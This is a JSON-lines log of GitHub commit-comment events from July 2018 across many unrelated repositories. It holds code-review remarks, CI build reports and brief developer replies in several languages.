{"id":"7986523217","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758564,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T02:40:10Z","updated_at":"2018-07-19T02:40:10Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T02:40:10Z"}
{"id":"7986530215","type":"CommitCommentEvent","actor":{"login":"GabTovar"},"repo":{"name":"GabTovar/curgit-heroes"},"payload":{"comment":{"id":29758572,"position":null,"line":null,"path":null,"commit_id":"0a9f2b86189f7653d1985224f9a579680a1089fb","created_at":"2018-07-19T02:42:54Z","updated_at":"2018-07-19T02:42:54Z","author_association":"OWNER","body":"Perfecto, esto me encanta. :new_moon_with_face: "}},"created_at":"2018-07-19T02:42:54Z"}
{"id":"7986531225","type":"CommitCommentEvent","actor":{"login":"happybai"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29758573,"position":17,"line":27,"path":"src/components/MyInfo.js","commit_id":"cd441f6676b660c5c38761d2617cc6d3d7578e9b","created_at":"2018-07-19T02:43:17Z","updated_at":"2018-07-19T02:43:17Z","author_association":"NONE","body":"For those repeat div element. It would be better to make a new component or use something such as 'forEach' to iterate it."}},"created_at":"2018-07-19T02:43:17Z"}
{"id":"7986533405","type":"CommitCommentEvent","actor":{"login":"arrickx"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29758577,"position":25,"line":39,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-19T02:44:10Z","updated_at":"2018-07-19T02:44:10Z","author_association":"NONE","body":"# **above link might not work. if so (appear blank page) use the below link instead.**\r\n\r\n> \"https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=2014-01-01&endtime=2014-01-02&minmagnitude=5\""}},"created_at":"2018-07-19T02:44:10Z"}
{"id":"7986534559","type":"CommitCommentEvent","actor":{"login":"nebularg"},"repo":{"name":"BigWigsMods/packager"},"payload":{"comment":{"id":29758579,"position":null,"line":null,"path":null,"commit_id":"ac9ee143acdce584953a4e75ae142d6c3d708983","created_at":"2018-07-19T02:44:34Z","updated_at":"2018-07-19T02:44:34Z","author_association":"MEMBER","body":"I threw this in so you could see the result of a changelog script. Adding an option to silence it seems like overkill, maybe just shortened it to 5/10 lines max?"}},"created_at":"2018-07-19T02:44:34Z"}
{"id":"7986535271","type":"CommitCommentEvent","actor":{"login":"boatmisser"},"repo":{"name":"boatmisser/swagger-core"},"payload":{"comment":{"id":29758581,"position":null,"line":null,"path":null,"commit_id":"b5102b537e9769e93f05b28f72ed4ad828c7fc2f","created_at":"2018-07-19T02:44:51Z","updated_at":"2018-07-19T02:44:51Z","author_association":"OWNER","body":"When swagger is used by a \"fat\" JAR based application (e.g. Dropwizard) Reflections parses the entire JAR, which is slow and produces larges numbers of keys and values.\r\nBy using Reflections filtering we can target just the packages we desire.\r\n\r\n**Example Benchmark**\r\nBefore:\r\n`Reflections took 1203 ms to scan 1 urls, producing 15550 keys and 29087 values`\r\nAfter:\r\n`Reflections took 66 ms to scan 1 urls, producing 18 keys and 19 values`"}},"created_at":"2018-07-19T02:44:51Z"}
{"id":"7986541106","type":"CommitCommentEvent","actor":{"login":"happybai"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29758591,"position":7,"line":6,"path":"src/styles/_nav.scss","commit_id":"cd441f6676b660c5c38761d2617cc6d3d7578e9b","created_at":"2018-07-19T02:46:56Z","updated_at":"2018-07-19T02:46:56Z","author_association":"NONE","body":"The color choice. I would prefer to use the grey color if there is no certained UI given. Such as #333 #666 #999 #aaa. Too many color will mess up the page."}},"created_at":"2018-07-19T02:46:56Z"}
{"id":"7986543421","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29758595,"position":null,"line":null,"path":null,"commit_id":"1ec7d44522f1eba23121193be5e24823c903292b","created_at":"2018-07-19T02:47:47Z","updated_at":"2018-07-19T02:47:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-425](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-425).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-425-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T02:47:47Z"}
{"id":"7986545499","type":"CommitCommentEvent","actor":{"login":"happybai"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29758598,"position":11,"line":10,"path":"src/styles/_nav.scss","commit_id":"cd441f6676b660c5c38761d2617cc6d3d7578e9b","created_at":"2018-07-19T02:48:24Z","updated_at":"2018-07-19T02:48:24Z","author_association":"NONE","body":"If possible. Try the Flex layout is not a bad choice."}},"created_at":"2018-07-19T02:48:24Z"}
{"id":"7986547681","type":"CommitCommentEvent","actor":{"login":"YoungDeeZH"},"repo":{"name":"YoungDeeZH/vue-webpack-todo"},"payload":{"comment":{"id":29758602,"position":null,"line":null,"path":null,"commit_id":"65a00bed1dcf13d21dffd7c67a8c8305e2d7bbb5","created_at":"2018-07-19T02:49:11Z","updated_at":"2018-07-19T02:49:11Z","author_association":"OWNER","body":"hash 和 chunkHash 的区别，\r\nchunkHash 适合在线上使用，不然每次hash下更新代码都会改变hash起不到缓存的作用\r\nruntimeChunk 为了缓存webpack内容\r\n"}},"created_at":"2018-07-19T02:49:11Z"}
{"id":"7986551020","type":"CommitCommentEvent","actor":{"login":"bryphe"},"repo":{"name":"esy/esy-install"},"payload":{"comment":{"id":29758610,"position":null,"line":null,"path":null,"commit_id":"bfd3edc8db31ddb9d83487ae2770648690af1f1c","created_at":"2018-07-19T02:50:27Z","updated_at":"2018-07-19T02:50:27Z","author_association":"COLLABORATOR","body":"Sorry about that @andreypopp ! Meant to revert that change prior to checking in - thanks for catching it."}},"created_at":"2018-07-19T02:50:27Z"}
{"id":"7986551188","type":"CommitCommentEvent","actor":{"login":"jixiaoyu0209"},"repo":{"name":"jixiaoyu0209/DataMachine"},"payload":{"comment":{"id":29758611,"position":null,"line":null,"path":null,"commit_id":"8f73cf3012ffbfd8cb928ef50c26b476fbca8407","created_at":"2018-07-19T02:50:31Z","updated_at":"2018-07-19T02:50:31Z","author_association":"OWNER","body":"update mail's config"}},"created_at":"2018-07-19T02:50:31Z"}
{"id":"7986551790","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29758612,"position":null,"line":null,"path":null,"commit_id":"7915851a835a38554b1e93927404fe37a208e622","created_at":"2018-07-19T02:50:45Z","updated_at":"2018-07-19T02:50:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-55](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-55).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-55-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T02:50:45Z"}
{"id":"7986557276","type":"CommitCommentEvent","actor":{"login":"BootlegSanesss"},"repo":{"name":"BLCM/BLCMods"},"payload":{"comment":{"id":29758616,"position":null,"line":null,"path":null,"commit_id":"70112d69fcc64935b9978d1e1af19cb67d0c0442","created_at":"2018-07-19T02:52:36Z","updated_at":"2018-07-19T02:52:36Z","author_association":"NONE","body":"what"}},"created_at":"2018-07-19T02:52:36Z"}
{"id":"7986561475","type":"CommitCommentEvent","actor":{"login":"p3lim"},"repo":{"name":"BigWigsMods/packager"},"payload":{"comment":{"id":29758623,"position":null,"line":null,"path":null,"commit_id":"ac9ee143acdce584953a4e75ae142d6c3d708983","created_at":"2018-07-19T02:54:12Z","updated_at":"2018-07-19T02:54:12Z","author_association":"NONE","body":"Yeah, right now it fills 2-3 pages of a terminal on my laptop, but tbh I don't _really_ need to see a manual changelog, because I know what's in it. Shortening it or making it optional would both be good."}},"created_at":"2018-07-19T02:54:12Z"}
{"id":"7986563496","type":"CommitCommentEvent","actor":{"login":"GitHubElena"},"repo":{"name":"GitHubElena/lalalla"},"payload":{"comment":{"id":29758626,"position":null,"line":null,"path":null,"commit_id":"16a6080053b9a923f1386b5737e3c7f38b55aa40","created_at":"2018-07-19T02:54:55Z","updated_at":"2018-07-19T02:54:55Z","author_association":"OWNER","body":"vvvvvvvvvvvvvvvvv"}},"created_at":"2018-07-19T02:54:55Z"}
{"id":"7986566123","type":"CommitCommentEvent","actor":{"login":"GitHubElena"},"repo":{"name":"GitHubElena/lalalla"},"payload":{"comment":{"id":29758633,"position":null,"line":null,"path":null,"commit_id":"16a6080053b9a923f1386b5737e3c7f38b55aa40","created_at":"2018-07-19T02:55:54Z","updated_at":"2018-07-19T02:55:54Z","author_association":"OWNER","body":">  **_@`bbbbbbbbbb[](url)`_**"}},"created_at":"2018-07-19T02:55:54Z"}
{"id":"7986568375","type":"CommitCommentEvent","actor":{"login":"Torca2001"},"repo":{"name":"Mrmeguyme/timetable-clock"},"payload":{"comment":{"id":29758638,"position":24,"line":98,"path":"frmClock.cs","commit_id":"ca46260de6c0f6c906c11c44d7837f8ef5a08b13","created_at":"2018-07-19T02:56:44Z","updated_at":"2018-07-19T02:56:44Z","author_association":"COLLABORATOR","body":"This is incorrect as it never actual reads the settings data before comparing."}},"created_at":"2018-07-19T02:56:44Z"}
{"id":"7986573056","type":"CommitCommentEvent","actor":{"login":"girol"},"repo":{"name":"uspdev/eventos"},"payload":{"comment":{"id":29758642,"position":11,"line":25,"path":"resources/views/index.blade.php","commit_id":"77bea5c8c826e894b76876fac3451107286dc77b","created_at":"2018-07-19T02:58:29Z","updated_at":"2018-07-19T02:58:29Z","author_association":"NONE","body":":hear_no_evil: "}},"created_at":"2018-07-19T02:58:29Z"}
{"id":"7986573963","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29758643,"position":121,"line":153,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-19T02:58:48Z","updated_at":"2018-07-19T02:58:48Z","author_association":"OWNER","body":"You are right, we do know the number of sensors and the number of unique observations there are per sensor before and after synchronization. But in this case, where we are only running it for a few sets, we don't know how many observations per sensor are available, for the selected number of sets. For five sets, we don't know that there only three unique observations per sensor before hand.\r\n\r\nOr am I wrong?"}},"created_at":"2018-07-19T02:58:48Z"}
{"id":"7986574222","type":"CommitCommentEvent","actor":{"login":"99ridho"},"repo":{"name":"ferico55/DKImagePickerController"},"payload":{"comment":{"id":29758645,"position":7,"line":397,"path":"DKCamera/DKCamera.swift","commit_id":"fa1719aa12710cb75506e8669df2d86af69587f1","created_at":"2018-07-19T02:58:54Z","updated_at":"2018-07-19T02:58:54Z","author_association":"NONE","body":"bisa langsung `currentDevice` krn udah dalem if let"}},"created_at":"2018-07-19T02:58:54Z"}
{"id":"7991312523","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29769800,"position":22,"line":23,"path":"Lesson1/Right_triangle.rb","commit_id":"687809ed94a5d7bfe3b7f2bbbd556b52cf8599bb","created_at":"2018-07-19T20:00:32Z","updated_at":"2018-07-19T20:00:32Z","author_association":"NONE","body":"А вот эту ветку следует скомбинировать с условием ниже. Продублирую с прошлой проверки\r\n\r\nОбрати внимание, что по заданию равнобердренность нужно проверять Только у прямоугольного треугольника"}},"created_at":"2018-07-19T20:00:32Z"}
{"id":"7991313155","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29769802,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-19T20:00:40Z","updated_at":"2018-07-19T20:00:40Z","author_association":"NONE","body":"filetrain.mat file and \r\nfiletest.mat file\r\nsend me plz.\r\n"}},"created_at":"2018-07-19T20:00:40Z"}
{"id":"7991317279","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29769810,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-19T20:01:30Z","updated_at":"2018-07-19T20:01:30Z","author_association":"OWNER","body":"Hmm, I can't reproduce the warning anymore. But the variable is clearly obsoleted at the definition site:\r\n\r\n```elisp\r\n(defvaralias 'find-tag-marker-ring 'xref--marker-ring)\r\n(make-obsolete-variable\r\n 'find-tag-marker-ring\r\n \"use `xref-push-marker-stack' or `xref-pop-marker-stack' instead.\"\r\n \"25.1\")\r\n```\r\n\r\nSo at one point I was getting the warning that `find-tag-marker-ring` is obsolete.\r\n"}},"created_at":"2018-07-19T20:01:30Z"}
{"id":"7991318396","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29769816,"position":22,"line":23,"path":"Lesson1/Right_triangle.rb","commit_id":"687809ed94a5d7bfe3b7f2bbbd556b52cf8599bb","created_at":"2018-07-19T20:01:44Z","updated_at":"2018-07-19T20:01:44Z","author_association":"NONE","body":"И кстати, когда ты будешь делать эту проверку уже в условии ниже - стороны будут отсортированы, так-что можно будет сравнивать только катеты."}},"created_at":"2018-07-19T20:01:44Z"}
{"id":"7991319186","type":"CommitCommentEvent","actor":{"login":"sjorge"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29769820,"position":11,"line":164,"path":"src/etc/inc/system.inc","commit_id":"188b098110acd4eaee360edb3bba53b2fb39845a","created_at":"2018-07-19T20:01:55Z","updated_at":"2018-07-19T20:01:55Z","author_association":"CONTRIBUTOR","body":"nit: perhaps this should be ::1 if IPv6 is enabled and 127.0.0.1 otherwise, probably more spots where this could apply so probably not worth any action."}},"created_at":"2018-07-19T20:01:55Z"}
{"id":"7991319922","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29769822,"position":39,"line":33,"path":"Lesson1/Right_triangle.rb","commit_id":"687809ed94a5d7bfe3b7f2bbbd556b52cf8599bb","created_at":"2018-07-19T20:02:05Z","updated_at":"2018-07-19T20:02:05Z","author_association":"NONE","body":"Тут индентацию нужно поправить."}},"created_at":"2018-07-19T20:02:05Z"}
{"id":"7991326238","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769835,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:03:29Z","updated_at":"2018-07-19T20:03:29Z","author_association":"NONE","body":"when I run the `composer install`, it installs the dependencies and at the end it shows this error:\r\n **Call to undefined function \r\nApp \\ inotify_init ()** \r\nand it does not create the key of the app and if I execute the `php artisan key: generate`, it also throws the error that I indicated you earlier."}},"created_at":"2018-07-19T20:03:29Z"}
{"id":"7991332358","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29769845,"position":null,"line":null,"path":null,"commit_id":"8827dfc2894e79b2e1a655fa09d2803c244c20c3","created_at":"2018-07-19T20:04:50Z","updated_at":"2018-07-19T20:04:50Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nbad indentation of a mapping entry at line 50, column 26:\n                    artifacts:\n                             ^\n\n</details>"}},"created_at":"2018-07-19T20:04:50Z"}
{"id":"7991332548","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769846,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:04:52Z","updated_at":"2018-07-19T20:04:52Z","author_association":"OWNER","body":"Does it still happen if you do ``composer install --no-dev``?"}},"created_at":"2018-07-19T20:04:52Z"}
{"id":"7991336455","type":"CommitCommentEvent","actor":{"login":"raylu"},"repo":{"name":"lbatalha/pastething"},"payload":{"comment":{"id":29769860,"position":14,"line":122,"path":"README.md","commit_id":"74a101bcc43aa69f513707a77f0742e716f4d9c8","created_at":"2018-07-19T20:05:42Z","updated_at":"2018-07-19T20:05:42Z","author_association":"CONTRIBUTOR","body":"dont → don't"}},"created_at":"2018-07-19T20:05:42Z"}
{"id":"7991338583","type":"CommitCommentEvent","actor":{"login":"lrennels"},"repo":{"name":"lrennels/fund"},"payload":{"comment":{"id":29769866,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-19T20:06:11Z","updated_at":"2018-07-19T20:06:11Z","author_association":"OWNER","body":"@ckingdon95 just FYI that this line would actually work either way, because the fund module exports `FUND`"}},"created_at":"2018-07-19T20:06:11Z"}
{"id":"7991341512","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29769878,"position":null,"line":null,"path":null,"commit_id":"05ec2285fec01bbd7fd16caa246b204d36220ef6","created_at":"2018-07-19T20:06:50Z","updated_at":"2018-07-19T20:06:50Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nInterpreterError at template.tasks.metadata.owner: object has no property head\n\n</details>"}},"created_at":"2018-07-19T20:06:50Z"}
{"id":"7991342973","type":"CommitCommentEvent","actor":{"login":"servel333"},"repo":{"name":"grpc/grpc-node"},"payload":{"comment":{"id":29769884,"position":20,"line":669,"path":"src/client.js","commit_id":"2c2940227f4bff8cf8b0f7846e623ca6e8d95f7a","created_at":"2018-07-19T20:07:10Z","updated_at":"2018-07-19T20:07:10Z","author_association":"NONE","body":"Should this be `getDefaultValues(metadata, options)` ?"}},"created_at":"2018-07-19T20:07:10Z"}
{"id":"7991343598","type":"CommitCommentEvent","actor":{"login":"RobLoach"},"repo":{"name":"libretro/Lakka-LibreELEC"},"payload":{"comment":{"id":29769885,"position":32,"line":49,"path":"packages/libretro/desmume/package.mk","commit_id":"ddff7a1f42ddf56781c6c1eda9983f44087e3b32","created_at":"2018-07-19T20:07:18Z","updated_at":"2018-07-19T20:07:18Z","author_association":"MEMBER","body":"The info files are installed by `core-info`. It lives!\r\nhttps://github.com/libretro/libretro-super/blob/master/dist/info/desmume2015_libretro.info"}},"created_at":"2018-07-19T20:07:18Z"}
{"id":"7991351245","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29769899,"position":26,"line":153,"path":"src/Core/Commit.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:08:58Z","updated_at":"2018-07-19T20:08:58Z","author_association":"NONE","body":"I'm trying to find where the error would come from in this block\r\ne.g. [`commitUnmountElementComponent`](https://github.com/thysultan/dio.js/blob/master/dist/umd.js#L1822) should never throw\r\n\r\nAlso nothing was catching this before, so I don't think throwing here was ever expected.\r\nI traced the stack up to `render()` and was unable to find a non-promise catch\r\n`render -> updateContainerElement -> reconcileElement -> reconcileElementChildren -> commitUnmountElement -> commitUnmountElementChildren`\r\n\r\nAlso looking at [`commitUnmountElement`](https://github.com/thysultan/dio.js/blob/master/dist/umd.js#L2367) we check `element.active` which would mean a child `element.active` would have to be false while the parent is true."}},"created_at":"2018-07-19T20:08:58Z"}
{"id":"7991358673","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769919,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:10:36Z","updated_at":"2018-07-19T20:10:36Z","author_association":"NONE","body":"Yes!\r\n[https://prnt.sc/k8l61j](url)\r\nAn image capture so you can see the error.\r\n"}},"created_at":"2018-07-19T20:10:36Z"}
{"id":"7991359553","type":"CommitCommentEvent","actor":{"login":"natinusala"},"repo":{"name":"libretro/Lakka-LibreELEC"},"payload":{"comment":{"id":29769923,"position":32,"line":49,"path":"packages/libretro/desmume/package.mk","commit_id":"ddff7a1f42ddf56781c6c1eda9983f44087e3b32","created_at":"2018-07-19T20:10:48Z","updated_at":"2018-07-19T20:10:48Z","author_association":"NONE","body":"Haha I figured that out, just forgot to remove the TODO. Thanks for pointing that out !"}},"created_at":"2018-07-19T20:10:48Z"}
{"id":"7991359558","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29769924,"position":13,"line":10,"path":"discriminant.rb","commit_id":"a06f54b27b36d92786754a6ddd31736dcec508b4","created_at":"2018-07-19T20:10:48Z","updated_at":"2018-07-19T20:10:48Z","author_association":"NONE","body":"Вот это у нас выбросит исключение, когда дискриминант будет меньше 0. Да и на самом деле, квадратный корень нам нужен только в условии где дискриминант больше 0. Так-что туда это вычисление и следует унести"}},"created_at":"2018-07-19T20:10:48Z"}
{"id":"7991362079","type":"CommitCommentEvent","actor":{"login":"alexonea"},"repo":{"name":"thetopor/topor-media-server"},"payload":{"comment":{"id":29769932,"position":34,"line":34,"path":"src/libtmplay/mixer.cc","commit_id":"47f4ed9a5cda27a9ad568314b53c17ccd85453e8","created_at":"2018-07-19T20:11:20Z","updated_at":"2018-07-19T20:11:20Z","author_association":"MEMBER","body":"Both the timeout struct and the fd set must be reset (re-initialized) for every iteration of the select loop. If something behaves strangely here, one thing you might want to try is to also reset the fs set before going into another select iteration (or at the beginning of the iteration). I suggest maintaining a copy of the original fd set and assigning it to the original fd set in each iteration."}},"created_at":"2018-07-19T20:11:20Z"}
{"id":"7991366846","type":"CommitCommentEvent","actor":{"login":"nathcoder"},"repo":{"name":"GHCSCW/ProviderHub"},"payload":{"comment":{"id":29769944,"position":null,"line":null,"path":null,"commit_id":"8c0d09e1cadf5c2d41fad76ee9a3f4db1847032b","created_at":"2018-07-19T20:12:22Z","updated_at":"2018-07-19T20:12:22Z","author_association":"NONE","body":"meant to say #20 not #21"}},"created_at":"2018-07-19T20:12:22Z"}
{"id":"7991368745","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29769950,"position":null,"line":null,"path":null,"commit_id":"8adc2b9728b7a2d2dfff3d90e4ddf1de94335bdf","created_at":"2018-07-19T20:12:46Z","updated_at":"2018-07-19T20:12:46Z","author_association":"CONTRIBUTOR","body":"Arrêtez s'il vous plaît d'agir sur le master. Vous créez des conflits en chaîne avec le PR :/"}},"created_at":"2018-07-19T20:12:46Z"}
{"id":"7991368988","type":"CommitCommentEvent","actor":{"login":"johnhawkinson"},"repo":{"name":"freelawproject/juriscraper"},"payload":{"comment":{"id":29769951,"position":177,"line":148,"path":"tests/test_pacer.py","commit_id":"33756fc9ab9ab3511d410b18b27791cd8e922c17","created_at":"2018-07-19T20:12:49Z","updated_at":"2018-07-19T20:12:49Z","author_association":"CONTRIBUTOR","body":"1.5+ years after the refactor, is this test still supposed to be disabled? If so, can we please get a better comment?"}},"created_at":"2018-07-19T20:12:49Z"}
{"id":"7991369180","type":"CommitCommentEvent","actor":{"login":"YohDeadfall"},"repo":{"name":"FlorianRainer/npgsql"},"payload":{"comment":{"id":29769952,"position":null,"line":null,"path":null,"commit_id":"52cb4aba451fa19b5520e1544e4c5de22866ac72","created_at":"2018-07-19T20:12:51Z","updated_at":"2018-07-19T20:12:51Z","author_association":"NONE","body":"@roji It's a copy of npgsql/npgsql#1878 which you approved and merged (:"}},"created_at":"2018-07-19T20:12:51Z"}
{"id":"7991369707","type":"CommitCommentEvent","actor":{"login":"alexonea"},"repo":{"name":"thetopor/topor-media-server"},"payload":{"comment":{"id":29769953,"position":48,"line":48,"path":"src/libtmplay/mixer.cc","commit_id":"47f4ed9a5cda27a9ad568314b53c17ccd85453e8","created_at":"2018-07-19T20:12:58Z","updated_at":"2018-07-19T20:12:58Z","author_association":"MEMBER","body":"If you just read the variable and it is a single variable, then the read is atomic. No need to guard it. Writes must, on the other hand be protected, if they are concurrent. Reads, even concurrent, don't do harm."}},"created_at":"2018-07-19T20:12:58Z"}
{"id":"7991369856","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29769954,"position":19,"line":15,"path":"discriminant.rb","commit_id":"a06f54b27b36d92786754a6ddd31736dcec508b4","created_at":"2018-07-19T20:13:00Z","updated_at":"2018-07-19T20:13:00Z","author_association":"NONE","body":"Это должно быть сразу после elsif. Стилистика такая\r\n```\r\nif condition\r\n  # do something\r\nelsif other_condtion\r\n  # do other stuff\r\nelse\r\n  # do your thing\r\nend\r\n```\r\nТолько сразу после else не нужно писать условие, потому-что в этом случае будет выполнен весь, код, который не попал ни в одно условие выше"}},"created_at":"2018-07-19T20:13:00Z"}
{"id":"7991370978","type":"CommitCommentEvent","actor":{"login":"TamtamSangani"},"repo":{"name":"TamtamSangani/Cheesesquare"},"payload":{"comment":{"id":29769959,"position":null,"line":null,"path":null,"commit_id":"33fc76a56a02f353414af87fa8cff1aa4812beb9","created_at":"2018-07-19T20:13:15Z","updated_at":"2018-07-19T20:13:15Z","author_association":"OWNER","body":"Readme "}},"created_at":"2018-07-19T20:13:15Z"}
{"id":"7991372372","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"WireMock-Net/WireMock.Net"},"payload":{"comment":{"id":29769962,"position":17,"line":57,"path":"src/WireMock.Net/Owin/OwinResponseMapper.cs","commit_id":"f1896ef73a1fe30f5d3ae1b2642012e2b8918d24","created_at":"2018-07-19T20:13:34Z","updated_at":"2018-07-19T20:13:34Z","author_association":"COLLABORATOR","body":"That code is for request headers, cannot be used for response.\r\n\r\nI found some more details:\r\nhttps://referencesource.microsoft.com/#system/net/system/Net/WebHeaderCollection.cs\r\nand\r\nhttps://github.com/jbevain/mono.net.httplistener/blob/master/Mono.Net/WebHeaderCollection.cs#L77\r\n\r\nAccording to that mono c# file, only a few headers are restricted on response.\r\n\r\nSo for now I'll keep my code as is.\r\nAnd please open a new issue when you still experience issues.\r\nOr try to use dotnet core instead of net45 / 46"}},"created_at":"2018-07-19T20:13:34Z"}
{"id":"7991376143","type":"CommitCommentEvent","actor":{"login":"markus-wa"},"repo":{"name":"markus-wa/demoinfocs-golang"},"payload":{"comment":{"id":29769974,"position":null,"line":null,"path":null,"commit_id":"854c8c8db0ffc07779ddfae6c18b3c72882d9a33","created_at":"2018-07-19T20:14:23Z","updated_at":"2018-07-19T20:14:23Z","author_association":"OWNER","body":"*generic"}},"created_at":"2018-07-19T20:14:23Z"}
{"id":"7991376531","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769975,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:14:28Z","updated_at":"2018-07-19T20:14:28Z","author_association":"OWNER","body":"Let me boot into Windows and see if I can fix it."}},"created_at":"2018-07-19T20:14:28Z"}
{"id":"7991379648","type":"CommitCommentEvent","actor":{"login":"alexonea"},"repo":{"name":"thetopor/topor-media-server"},"payload":{"comment":{"id":29769981,"position":28,"line":28,"path":"src/libtmplay/mixer.cc","commit_id":"47f4ed9a5cda27a9ad568314b53c17ccd85453e8","created_at":"2018-07-19T20:15:10Z","updated_at":"2018-07-19T20:15:10Z","author_association":"MEMBER","body":"As opposed to the overly protected read to the ```_exit``` variable, you are not protecting at all access to the ```_channels``` container, which indeed might change in the middle of your iterator loop, causing bad pointers and eventually death by segmentation fault."}},"created_at":"2018-07-19T20:15:10Z"}
{"id":"7991385063","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29769995,"position":null,"line":null,"path":null,"commit_id":"6b6da5d6bf764e48597339f67707b911e058db69","created_at":"2018-07-19T20:16:19Z","updated_at":"2018-07-19T20:16:19Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/5623994/42967690-1085be94-8b6f-11e8-87b5-f2ea545d4322.png)\r\n"}},"created_at":"2018-07-19T20:16:19Z"}
